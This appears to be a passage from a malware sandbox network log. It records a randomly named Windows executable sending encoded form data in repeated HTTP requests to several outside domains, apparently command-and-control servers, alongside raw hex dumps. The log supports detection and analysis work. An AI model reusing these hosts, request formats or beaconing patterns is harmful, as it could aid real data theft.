e1 83 31 fb 8b 29 05 5a a2 70 12 2e e3 02 25 f3 d0 9f bb de 15 a3 ba 04 7a e6 cd bd c8 5e 86 51 01 ba 42 c7 c1 fb 9f 7c 06 [TRUNCATED]
                                                                                                              Data Ascii: i m4+QY$%6EJM+C*t#) h$V~7FovLKs}%nrMVpp~vGr<pe0{~v<u<vl!<~kY=}x3oisx?7w<E- /}wy~z2;%s7A8U0U80Bg?~/1)Zp.%z^QB|)A)[^/Xc/p>0v7"X>fq3.wFgg8 *ql%de>#Y3O'&YQ}x3T7( c18F6`xuRtJ)Ee+W;y~>IFh'KPG/6k<E<pE>%)&jK6b\E-p*4R\/ y$vQjQ]E,F!]b@DvQ(y99yRhI&bn&D7UOp0%S2`RBn/Ej5|sBx
                                                                                                              Nov 5, 2024 15:34:14.253185987 CET1289INData Raw: 55 54 d4 55 14 f4 b5 4f 4b 2f f0 16 e7 e1 1c 9b cf 7b 96 ae 6b a2 ae 19 a2 a5 ab f0 2d 08 cf c2 c1 61 de 58 3f 99 d9 67 de 67 93 a7 9e b3 dc a0 90 cb 05 9f 74 63 4f c6 ab 45 10 da 6e fc 64 2c 8b b2 fa 64 2c 1a 4f c6 4e 14 2e 16 9e cb eb 96 69 a8
                                                                                                              Data Ascii: UTUOK/{k-aX?ggtcOEnd,d,ON.i<S';<7l?ksO# esXsr&1XmnL7Y}+e~k\?@/A4;-Tyel%dm;#8byE
                                                                                                              Nov 5, 2024 15:34:14.253228903 CET1289INData Raw: dc 07 20 24 70 32 c0 67 58 86 8b c1 c8 16 a6 21 8e 3d eb a2 c8 29 f2 e2 8a 7b 3f f2 ed 00 10 dd 66 ad 03 1a 60 18 7d 64 83 9a e7 ed 63 78 13 fe dc fb e2 78 79 60 8f 3c 90 08 16 90 cb 69 89 df 99 e1 a8 51 cf 3a 25 a8 ac a5 10 47 ce 31 08 54 00 21
                                                                                                              Data Ascii: $p2gX!=){?f`}dcxxy`<iQ:%G1T!~Sxs\hXMba{.Q|s"GV|1)oCw??o2FY|v./`gG <[fjL^,%>c9gi
                                                                                                              Nov 5, 2024 15:34:14.253271103 CET1289INData Raw: 23 81 23 fb c2 e3 8a 9e b8 5a 8f e8 14 b9 51 b8 e0 a7 3e 8e b7 1f 4e 82 55 74 20 e9 8b ab 21 17 db e0 73 a1 2f 2c 99 e2 db c3 a3 cd 20 cf 48 f6 40 4a 00 7c bd a5 d9 f8 9f 2a 1e b1 4a a0 c6 7e 54 ae 10 75 71 75 54 16 c3 51 49 ca 49 5f 2c 8b 00 f7
                                                                                                              Data Ascii: ##ZQ>NUt !s/, H@J|*J~TuquTQII_,<<)'HQ*h!*b^!$*ZzG5g#!XF<Opqs8lxD<oC%sW\BOiM1V1|kh IumqS}5Azf.=^kx/
                                                                                                              Nov 5, 2024 15:34:14.253312111 CET1289INData Raw: b4 f9 f2 cf fb 1c 79 f0 c7 f7 c1 a2 b0 c5 e2 0d e2 c1 f5 c0 6c 03 53 4b 45 66 00 2d 23 6a c5 26 5d 9c 49 cb f2 81 5a a7 81 66 52 04 01 ac cf 48 a6 da 9b da ab 80 59 99 b6 29 5c 1c b9 6d 2c b8 0a 5f 9e 31 6f a6 75 d4 86 68 dd bc 77 4e f6 66 b3 7f
                                                                                                              Data Ascii: ylSKEf-#j&]IZfRHY)\m,_1ouhwNf}TKTLiBe2a:Zn9{X1TkfZ-i,4'^YgzCn2B|p NK+._6Tj`}EH`C)#%nfjrT; \%))T
                                                                                                              Nov 5, 2024 15:34:14.253355026 CET1289INData Raw: 17 5b 1a 73 3d 12 17 40 14 0d 67 62 1f 35 7f e6 f9 e8 6c 72 28 8e 24 59 1d 49 a6 de 06 85 0e 07 74 e8 92 88 e8 f4 89 2d ad 05 cc 10 8b c6 48 d2 d7 c1 cb 84 58 b3 4d 63 2d 60 8a d8 02 dc 8a 56 04 4f bc 0e 36 1a 48 8b ac 70 8c 8a 41 24 2b 03 ae e7
                                                                                                              Data Ascii: [s=@gb5lr($YIt-HXMc-`VO6HpA$+.<a;mdy$dYIh$k,%czH.M8mqz0l'np;ogbt:UZ3-I<9)5<|U^Q7\0%i6Vq
                                                                                                              Nov 5, 2024 15:34:14.253396034 CET1289INData Raw: 10 c7 0c db d4 d2 34 bd a5 f9 9c 7b 57 e0 87 3b 3e 8e 31 81 94 0d 53 34 5b b8 4d ad 29 b4 32 ab ca 67 16 28 d7 06 60 b2 31 99 94 b3 96 a0 39 3a 9b d8 07 fa 48 52 8d 91 2c 1b 23 69 c8 89 6f 63 e2 81 a4 69 23 08 a6 65 59 1d e2 e1 76 10 a9 b4 15 5d
                                                                                                              Data Ascii: 4{W;>1S4[M)2g(`19:HR,#ioci#eYv]5yE^8L1+^9qm)h9 k2\$1IVd.RE%rEc}PlY1GOQG+CQ_DYgeXFUo9(CO03H
                                                                                                              Nov 5, 2024 15:34:14.253437042 CET1289INData Raw: 4f b4 46 9f 66 30 69 6f 19 f7 b0 70 47 15 80 b2 b3 2a 29 2a 3f e2 4a 1b 43 39 19 7c 8b f6 fc 04 94 23 60 47 73 72 c5 bd a6 6b 10 b0 d5 71 80 a1 ba a0 8d 4b 8e bf 29 23 a3 95 29 15 0a 59 5a 71 b3 4b a1 a0 21 94 f4 6e 26 8c 74 49 37 2e e0 03 ca d0
                                                                                                              Data Ascii: OFf0iopG*)*?JC9|#`GsrkqK)#)YZqK!n&tI7.o*0b;%|k$sR+V*7YHZ6LlxUQmb8E["-V_j7V,Z$VN&:.k=ur."nsuvQag6WI)
                                                                                                              Nov 5, 2024 15:34:14.253478050 CET1289INData Raw: 4a 56 7c d9 4b f4 b9 05 f2 fe 51 e7 16 c8 7b 44 9b 5b 60 ed 19 65 6e 81 79 8b e8 72 8b 52 76 8b 2a 77 2f b0 7f 34 b9 4d 59 db 44 91 5b 57 d5 46 d1 e3 b6 aa b6 51 d4 b8 35 2b fd a3 c5 ad 8b e8 15 25 6e 81 bd 77 74 b8 8d f1 eb 15 15 6e 53 b5 7d a2
                                                                                                              Data Ascii: JV|KQ{D[`enyrRv*w/4MYD[WFQ5+%nwtnS}-nnv}oBE{[`mw}tFu[_4QVXmtGm[zNHEi~$5vm(l[a@#V=(k[]wMCyI7I}Q;*
                                                                                                              Nov 5, 2024 15:34:14.253520012 CET1289INData Raw: 9b 51 b6 51 2a f5 ea 66 f1 36 77 69 aa 4d 75 15 62 2a 4d 56 1d 6f 22 99 9a 67 ab b2 68 81 e3 2b ed 6e 90 0b b3 4b fd b8 92 f7 2f 28 79 6b 41 ad 0b 28 1a 22 8a 2e 8b 9d c9 1d ba 1e c5 51 3d cb b5 dc 09 c8 1f 24 ad 99 10 da 4d 25 f8 6b ea b6 f8 e2
                                                                                                              Data Ascii: QQ*f6wiMub*MVo"gh+nK/(ykA(".Q=$M%k^c+%tE4G4S*]miH{E~N|/NQY Bm5e2-EIN4M[V1tTu-td7dd1)t:u[6Hgyj]cJF{PB<l[#;(]EAE
                                                                                                              Nov 5, 2024 15:34:14.371258020 CET1289INData Raw: 82 fb b3 cf 7f e0 7f fa 39 a4 2f a3 95 97 81 02 f6 a9 7f 86 d0 45 e9 c1 e7 6a ed 7f 34 77 b7 d1 80 dc 22 65 55 69 2f 7c e1 52 08 a3 b3 f1 80 d9 9c fc 4b ab ce 3f 8d c3 39 80 8f 1f 16 f0 7d e4 fa cb 1f ff e8 93 01 b7 bc 5e 78 c7 03 7b b1 08 7c 87
                                                                                                              Data Ascii: 9/Ej4w"eUi/|RK?9}^x{||q] ?za Wp;d@i: : .a4fx<)8?8tA^y2JXHLBap3rf/@3;t|=xo`.#eu97S


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.11.204974566.198.240.15804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:34:16.563752890 CET466OUTGET /ytnk/?Q2_4=uFAB3rEwaKr/uv81jElgMKFBplV4zOO0W/0UV/qGGe8UYgGdotW+PL1Lw+hHObTImHBkjwc0j1onCJuTKIEEH1/5TCKt9SsHo63opvn6TJdVFqr1WzvPAJA=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.abuali-contracting.art
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:34:16.834894896 CET618INHTTP/1.1 301 Moved Permanently
                                                                                                              Date: Tue, 05 Nov 2024 14:34:16 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/8.1.29
                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                              X-Redirect-By: WordPress
                                                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Location: http://abuali-contracting.art/ytnk/?Q2_4=uFAB3rEwaKr/uv81jElgMKFBplV4zOO0W/0UV/qGGe8UYgGdotW+PL1Lw+hHObTImHBkjwc0j1onCJuTKIEEH1/5TCKt9SsHo63opvn6TJdVFqr1WzvPAJA=&uXP=1HX8
                                                                                                              Content-Length: 0
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.11.20497463.33.130.190804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:34:22.082684040 CET729OUTPOST /5g7z/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.godskids.store
                                                                                                              Origin: http://www.godskids.store
                                                                                                              Referer: http://www.godskids.store/5g7z/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 70 49 55 2b 46 74 65 45 4f 57 45 31 79 2b 70 37 2b 66 39 67 47 72 45 71 4d 70 38 65 42 55 59 67 78 6b 36 48 63 44 67 44 59 78 59 52 69 2f 41 76 39 74 5a 2f 47 4c 57 66 4a 76 72 78 59 35 53 4c 2f 72 73 6f 66 75 4a 38 50 47 6c 69 61 4c 33 4d 4c 69 46 6e 6f 2f 70 44 69 71 30 59 6c 32 78 30 63 45 71 48 30 76 51 4e 55 65 4a 51 34 41 63 51 37 56 6b 66 43 34 57 42 30 31 41 53 70 59 41 65 35 76 52 34 57 56 78 64 70 6e 55 53 5a 42 6a 45 6e 68 34 48 54 47 51 79 78 6b 38 62 63 62 33 6d 46 4d 45 34 6a 34 55 54 56 78 51 2b 54 53 56 79 52 78 32 66 49 58 6b 6c 50 35 57 78 66 48 48 52 69 51 3d 3d
                                                                                                              Data Ascii: Q2_4=pIU+FteEOWE1y+p7+f9gGrEqMp8eBUYgxk6HcDgDYxYRi/Av9tZ/GLWfJvrxY5SL/rsofuJ8PGliaL3MLiFno/pDiq0Yl2x0cEqH0vQNUeJQ4AcQ7VkfC4WB01ASpYAe5vR4WVxdpnUSZBjEnh4HTGQyxk8bcb3mFME4j4UTVxQ+TSVyRx2fIXklP5WxfHHRiQ==


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.11.20497473.33.130.190804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:34:24.726747036 CET749OUTPOST /5g7z/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.godskids.store
                                                                                                              Origin: http://www.godskids.store
                                                                                                              Referer: http://www.godskids.store/5g7z/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 70 49 55 2b 46 74 65 45 4f 57 45 31 30 75 35 37 38 38 56 67 41 4c 45 70 51 35 38 65 61 45 59 6b 78 6a 79 48 63 43 6c 49 5a 44 4d 52 69 61 6b 76 2b 73 5a 2f 42 4c 57 66 43 50 72 4f 58 5a 53 55 2f 72 67 67 66 75 46 38 50 43 46 69 61 4c 6e 4d 4c 52 64 6d 70 76 70 42 36 61 30 61 34 6d 78 30 63 45 71 48 30 76 30 6e 55 66 68 51 2f 77 41 51 36 30 6b 51 63 49 58 7a 31 31 41 53 74 59 41 61 35 76 52 61 57 55 74 33 70 6b 73 53 5a 44 37 45 6d 77 34 47 49 57 51 34 2f 45 39 48 56 5a 61 35 44 63 73 2b 69 37 6b 72 64 67 4e 45 66 6b 45 6f 4d 44 43 37 4c 45 34 58 4c 4a 76 5a 64 46 47 4b 2f 5a 42 5a 37 63 46 78 4e 6c 6e 62 45 35 73 31 59 48 4f 5a 76 79 49 3d
                                                                                                              Data Ascii: Q2_4=pIU+FteEOWE10u5788VgALEpQ58eaEYkxjyHcClIZDMRiakv+sZ/BLWfCPrOXZSU/rggfuF8PCFiaLnMLRdmpvpB6a0a4mx0cEqH0v0nUfhQ/wAQ60kQcIXz11AStYAa5vRaWUt3pksSZD7Emw4GIWQ4/E9HVZa5Dcs+i7krdgNEfkEoMDC7LE4XLJvZdFGK/ZBZ7cFxNlnbE5s1YHOZvyI=


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.11.20497483.33.130.190804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:34:27.366565943 CET7734OUTPOST /5g7z/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.godskids.store
                                                                                                              Origin: http://www.godskids.store
                                                                                                              Referer: http://www.godskids.store/5g7z/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 70 49 55 2b 46 74 65 45 4f 57 45 31 30 75 35 37 38 38 56 67 41 4c 45 70 51 35 38 65 61 45 59 6b 78 6a 79 48 63 43 6c 49 5a 44 55 52 68 6f 73 76 35 2f 78 2f 41 4c 57 66 42 50 72 50 58 5a 54 4f 2f 72 6f 6b 66 75 35 4b 50 41 39 69 56 49 66 4d 43 45 78 6d 6a 76 70 42 7a 36 30 5a 6c 32 77 70 63 46 61 4c 30 76 45 6e 55 66 68 51 2f 79 30 51 39 6c 6b 51 65 49 57 42 30 31 41 57 70 59 41 69 35 76 34 6c 57 55 70 4e 70 56 4d 53 59 6a 72 45 72 6d 4d 47 56 47 51 2b 34 45 39 50 56 5a 57 63 44 63 67 44 69 36 41 42 64 69 74 45 4d 41 52 53 49 68 2b 2b 66 46 6b 58 48 72 79 67 64 44 71 6f 39 75 52 74 30 4f 35 46 48 7a 6e 38 4d 62 31 36 4b 55 4f 59 7a 31 6e 2b 6f 37 57 67 53 4c 46 48 63 6c 2b 61 39 63 4f 33 6f 35 65 42 6d 6d 55 35 52 6a 57 43 30 4d 63 51 6d 65 7a 46 68 6d 32 4b 6c 67 31 74 54 56 64 57 59 4c 6d 4a 75 78 31 6f 69 47 5a 51 58 4d 75 72 74 7a 54 61 52 46 50 4a 41 52 4f 39 6f 6a 2b 6d 50 55 48 6e 70 4c 37 5a 63 42 54 30 43 57 6a 63 74 2f 73 62 49 6a 35 6b 39 32 76 6b 6f 4c 72 53 68 43 33 32 68 [TRUNCATED]
                                                                                                              Data Ascii: Q2_4=pIU+FteEOWE10u5788VgALEpQ58eaEYkxjyHcClIZDURhosv5/x/ALWfBPrPXZTO/rokfu5KPA9iVIfMCExmjvpBz60Zl2wpcFaL0vEnUfhQ/y0Q9lkQeIWB01AWpYAi5v4lWUpNpVMSYjrErmMGVGQ+4E9PVZWcDcgDi6ABditEMARSIh++fFkXHrygdDqo9uRt0O5FHzn8Mb16KUOYz1n+o7WgSLFHcl+a9cO3o5eBmmU5RjWC0McQmezFhm2Klg1tTVdWYLmJux1oiGZQXMurtzTaRFPJARO9oj+mPUHnpL7ZcBT0CWjct/sbIj5k92vkoLrShC32hZzJ183Ii7vu4nulWjCGtdsCHYotN4lWcr3E0Eay+javm8HPlk7D4Gjieo0ZR3NiRo0dlkN8BYVxaiE7VZ8F2AiIP05Q/nZPcnnHfskKqQ2algDMeazv9kn3yDr7lf+hsIafZ5XhANiR8uV7CQzYfDnCsAMRB+G1kEMtr/CwEW+WyJa6FgSq2IivxwA37mhIQ5vYeOChgNwSbh2Rq11H/g68DvdiWOQSa3mfWiX93WP3toGJA1TQrOtBI+MEC/j+k7VeGAZJNBBl6jKtsmQvjcWxQ5Zthdhosl7vEa3DDZPepupvHn+mkMuGRKaw/9IO923kJf6Ui+fqOcELsENmTH7gTPQlUSH7e1kYM0fMfrnRe7wRozN4bBgR2B5RlAK1f5tFWIXI6EwFcdT3Ev9b/RyStsYIcJgfgrXBfvyXn3LaTgl1DcuzQRuMlliwDfUg/83RBgnvNkx9rc+ajSNmXGC9btdRzbmWjccQt1YVUCfsByb+eGTY0hiIup/fb2qF87myWCv8pO7ZvAsN274rtD0zYFno2EIyid1OQiD+rid4ivrUqITs1FowAuj2uq391VHOxCrx30+j9xP048KXXitPI6oZdOIWhTtre4LlS/iLmbaa+aRvjy8/AGplhu0F0A60U7nt5BqreK2/EFb7F7EZGbUBY0CuZQX [TRUNCATED]
                                                                                                              Nov 5, 2024 15:34:27.366686106 CET164OUTData Raw: 33 30 67 70 4f 49 65 54 52 63 31 51 55 34 52 69 47 38 6e 31 54 4f 6b 2b 35 64 64 34 35 30 57 44 79 30 42 4f 59 6b 35 39 6d 30 59 71 42 53 79 77 63 43 7a 67 4a 73 6d 50 75 35 77 54 46 44 59 4c 4d 6b 36 44 72 59 4f 34 32 71 72 4a 4a 6c 6c 73 68 74
                                                                                                              Data Ascii: 30gpOIeTRc1QU4RiG8n1TOk+5dd450WDy0BOYk59m0YqBSywcCzgJsmPu5wTFDYLMk6DrYO42qrJJllshtsG9D+rNEjeAngu7LIWT62ZG2JHFdprf+4rZH67s+RsIg+ulAK+Q8+ShddrlVBH7o883u3ycdTn4LiExA==


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              8192.168.11.20497493.33.130.190804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:34:30.007213116 CET458OUTGET /5g7z/?Q2_4=kK8eGZeOL0c0i7pZ0ONPINYAGZoAPWpd4nCLeggjcj8HoPAJjspSGomAMuDSSayw1bMnL6JfGjY3P9qtC0w+rul42/5pklRpQ1va0t0kDdVVqU9rzEU/DKw=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.godskids.store
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:34:30.128454924 CET389INHTTP/1.1 200 OK
                                                                                                              Server: openresty
                                                                                                              Date: Tue, 05 Nov 2024 14:34:30 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 249
                                                                                                              Connection: close
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 32 5f 34 3d 6b 4b 38 65 47 5a 65 4f 4c 30 63 30 69 37 70 5a 30 4f 4e 50 49 4e 59 41 47 5a 6f 41 50 57 70 64 34 6e 43 4c 65 67 67 6a 63 6a 38 48 6f 50 41 4a 6a 73 70 53 47 6f 6d 41 4d 75 44 53 53 61 79 77 31 62 4d 6e 4c 36 4a 66 47 6a 59 33 50 39 71 74 43 30 77 2b 72 75 6c 34 32 2f 35 70 6b 6c 52 70 51 31 76 61 30 74 30 6b 44 64 56 56 71 55 39 72 7a 45 55 2f 44 4b 77 3d 26 75 58 50 3d 31 48 58 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Q2_4=kK8eGZeOL0c0i7pZ0ONPINYAGZoAPWpd4nCLeggjcj8HoPAJjspSGomAMuDSSayw1bMnL6JfGjY3P9qtC0w+rul42/5pklRpQ1va0t0kDdVVqU9rzEU/DKw=&uXP=1HX8"}</script></head></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              9192.168.11.2049750161.97.142.144804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:34:35.654304028 CET726OUTPOST /o2wj/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.030002832.xyz
                                                                                                              Origin: http://www.030002832.xyz
                                                                                                              Referer: http://www.030002832.xyz/o2wj/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 33 4a 46 44 43 33 78 71 31 37 52 6c 6b 33 57 49 45 66 46 4a 73 2b 4d 53 70 4f 6b 74 4f 2f 7a 6a 65 7a 6c 2b 43 36 63 47 33 51 63 4b 74 48 2f 65 53 5a 49 6c 34 58 74 69 79 5a 4d 34 6d 48 56 61 5a 4a 64 4f 35 6b 6f 33 62 35 38 52 42 2b 38 63 42 65 51 61 6e 50 67 6a 67 32 6d 56 38 55 52 4a 34 38 64 69 4e 69 59 4d 66 5a 76 65 53 4e 72 68 64 33 33 57 33 49 7a 61 2b 62 79 71 64 74 76 61 31 43 77 68 41 42 77 4f 72 46 6f 5a 75 32 4a 66 6c 42 31 63 52 51 66 62 66 4c 50 69 71 5a 35 33 55 71 53 41 5a 6b 33 54 6e 31 32 6b 4c 61 6b 7a 75 6e 65 6b 69 44 63 75 43 32 47 45 42 68 35 41 56 67 3d 3d
                                                                                                              Data Ascii: Q2_4=3JFDC3xq17Rlk3WIEfFJs+MSpOktO/zjezl+C6cG3QcKtH/eSZIl4XtiyZM4mHVaZJdO5ko3b58RB+8cBeQanPgjg2mV8URJ48diNiYMfZveSNrhd33W3Iza+byqdtva1CwhABwOrFoZu2JflB1cRQfbfLPiqZ53UqSAZk3Tn12kLakzunekiDcuC2GEBh5AVg==
                                                                                                              Nov 5, 2024 15:34:35.855681896 CET1289INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Tue, 05 Nov 2024 14:34:35 GMT
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              ETag: W/"66cce1df-b96"
                                                                                                              Content-Encoding: gzip
                                                                                                              Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                              Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc(aL`!I> [TRUNCATED]
                                                                                                              Nov 5, 2024 15:34:35.855732918 CET317INData Raw: f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 27 07 2f 88 08 5d b8 dd 9d c3 da 74 74 30 c5 f1 c0 04 7b 7b cc 88 10 22 a1 98 47 c4 0f 38 8a c0 41 97 ae 98 04 90 82 7e c6 a8 8b de e5 5b 46 90 0d 8e 03 08 19
                                                                                                              Data Ascii: wlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5LznQVT)F[EG{^kTs0N[JJ


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              10192.168.11.2049751161.97.142.144804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:34:38.393518925 CET746OUTPOST /o2wj/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
